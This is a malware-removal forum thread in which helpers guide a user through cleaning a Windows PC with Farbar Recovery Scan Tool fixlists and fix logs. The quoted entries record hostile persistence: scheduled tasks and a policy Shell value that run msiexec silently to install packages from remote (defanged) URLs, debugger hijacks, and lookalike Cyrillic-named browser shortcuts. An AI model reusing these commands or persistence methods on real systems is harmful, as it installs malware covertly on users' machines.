HKLM\...\Providers\9xihyc2u: C:\Program Files\Steerwardpriboly Builder\local32spl.dll <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {D53A7C8A-0595-11E7-85F9-64006A5CFC35} - -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-21] <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Applemy\Application\chrome.exe <==== ATTENTION
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
C:\ProgramData\BIT
R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [176552 2017-03-03] ()
C:\WINDOWS\System32\drivers\cryptfd.sys
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
C:\WINDOWS\System32\DRIVERS\lnvguard.sys
C:\Users\dejan\k350n_.reg
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
C:\Program Files\Steerwardpriboly Builder
C:\Users\dejan\AppData\Roaming\Browsers
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{C7433376-6A29-4A5B-BC90-11A8C7EB83B9}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{A658861D-CBA9-4ABF-B92A-DA7911FBB27B}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{766897D0-3B5A-4C85-B391-F14DBDFE6444}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
FirewallRules: [{6027F5AB-9B90-413A-BD09-10043CD649E1}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
EmptyTemp:


In Notepad, click File --> Save As
Under Encoding, select Unicode.
Name the file Fixlist and save it to the Desktop.
Double-click FRST.exe to run it again.
Click Fix and wait until the program finishes.
If the program asks to restart the computer, let it do so without interruption.
When it finishes, fixlog.txt will open; copy its contents into this thread.
The file (fixlog.txt) will also be on the Desktop.

offline
  • in administration
  • Joined: 16 Oct 2010
  • Posts: 3468
  • Location: KRAGUJEVAC

After completing the procedure the computer has no internet and I can't attach the FIXLIST.

offline
  • Joined: 14 Jun 2016
  • Posts: 535

Hello,
please describe the internet problem in more detail.

Also, do this:

Open Command Prompt and type the command:

ping 8.8.8.8

Take a screenshot of the command's output, or write whether you got a result similar to the one in the picture below.


offline
  • in administration
  • Joined: 16 Oct 2010
  • Posts: 3468
  • Location: KRAGUJEVAC

The internet came back. I did everything according to the procedure.


CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88OYU3RTwyRjE3OWUyMdYyFjY2NkE2NUZXRjq2NWH5Fq== /q <==== ATTENTION
HKLM\...\Providers\9xihyc2u: C:\Program Files\Steerwardpriboly Builder\local32spl.dll <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {D53A7C8A-0595-11E7-85F9-64006A5CFC35} - -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-21] <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Applemy\Application\chrome.exe <==== ATTENTION
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
C:\ProgramData\BIT
R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [176552 2017-03-03] ()
C:\WINDOWS\System32\drivers\cryptfd.sys
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
C:\WINDOWS\System32\DRIVERS\lnvguard.sys
C:\Users\dejan\k350n_.reg
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: -> <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
C:\Program Files\Steerwardpriboly Builder
C:\Users\dejan\AppData\Roaming\Browsers
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{C7433376-6A29-4A5B-BC90-11A8C7EB83B9}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{A658861D-CBA9-4ABF-B92A-DA7911FBB27B}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{766897D0-3B5A-4C85-B391-F14DBDFE6444}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
FirewallRules: [{6027F5AB-9B90-413A-BD09-10043CD649E1}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
EmptyTemp:

offline
  • Joined: 26 Aug 2010
  • Posts: 10622
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

You posted fixlist.txt, not fixlog.txt.

offline
  • in administration
  • Joined: 16 Oct 2010
  • Posts: 3468
  • Location: KRAGUJEVAC

Oh, I apologize.


Fix result of Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Ran by dejan (23-08-2017 23:20:44) Run:2
Running from C:\Users\dejan\Desktop
Loaded Profiles: dejan (Available Profiles: dejan)
Boot Mode: Normal

==============================================

fixlist content:
*****************
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88OYU3RTwyRjE3OWUyMdYyFjY2NkE2NUZXRjq2NWH5Fq== /q <==== ATTENTION
HKLM\...\Providers\9xihyc2u: C:\Program Files\Steerwardpriboly Builder\local32spl.dll <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {D53A7C8A-0595-11E7-85F9-64006A5CFC35} - -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-21] <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Applemy\Application\chrome.exe <==== ATTENTION
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
C:\ProgramData\BIT
R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [176552 2017-03-03] ()
C:\WINDOWS\System32\drivers\cryptfd.sys
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
C:\WINDOWS\System32\DRIVERS\lnvguard.sys
C:\Users\dejan\k350n_.reg
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: -> <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
C:\Program Files\Steerwardpriboly Builder
C:\Users\dejan\AppData\Roaming\Browsers
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{C7433376-6A29-4A5B-BC90-11A8C7EB83B9}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{A658861D-CBA9-4ABF-B92A-DA7911FBB27B}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{766897D0-3B5A-4C85-B391-F14DBDFE6444}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
FirewallRules: [{6027F5AB-9B90-413A-BD09-10043CD649E1}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
EmptyTemp:
*****************

Error: (0) Failed to create a restore point.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => key not found.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value not found.
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\9xihyc2u => key removed successfully.
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order 9xihyc2u => not found.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => key not found.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{D53A7C8A-0595-11E7-85F9-64006A5CFC35} => value not found.
HKLM\Software\Classes\CLSID\{D53A7C8A-0595-11E7-85F9-64006A5CFC35} => key not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key removed successfully.
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect => key removed successfully.
C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData => not found
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => key removed successfully.
HKLM\System\CurrentControlSet\Services\BIT => key removed successfully.
BIT => service removed successfully.
"C:\ProgramData\BIT" => not found.
cryptfd => Unable to stop service.
HKLM\System\CurrentControlSet\Services\cryptfd => key removed successfully.
cryptfd => service removed successfully.
C:\WINDOWS\System32\drivers\cryptfd.sys => moved successfully

offline
  • Joined: 26 Aug 2010
  • Posts: 10622
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

Let's do it this way.

Pack the folder C:\FRST\Logs into an archive and attach it to your post.

offline
  • in administration
  • Joined: 16 Oct 2010
  • Posts: 3468
  • Location: KRAGUJEVAC


offline
  • Joined: 14 Jun 2016
  • Posts: 535

Give me new FRST reports. Make sure Addition.txt is checked.
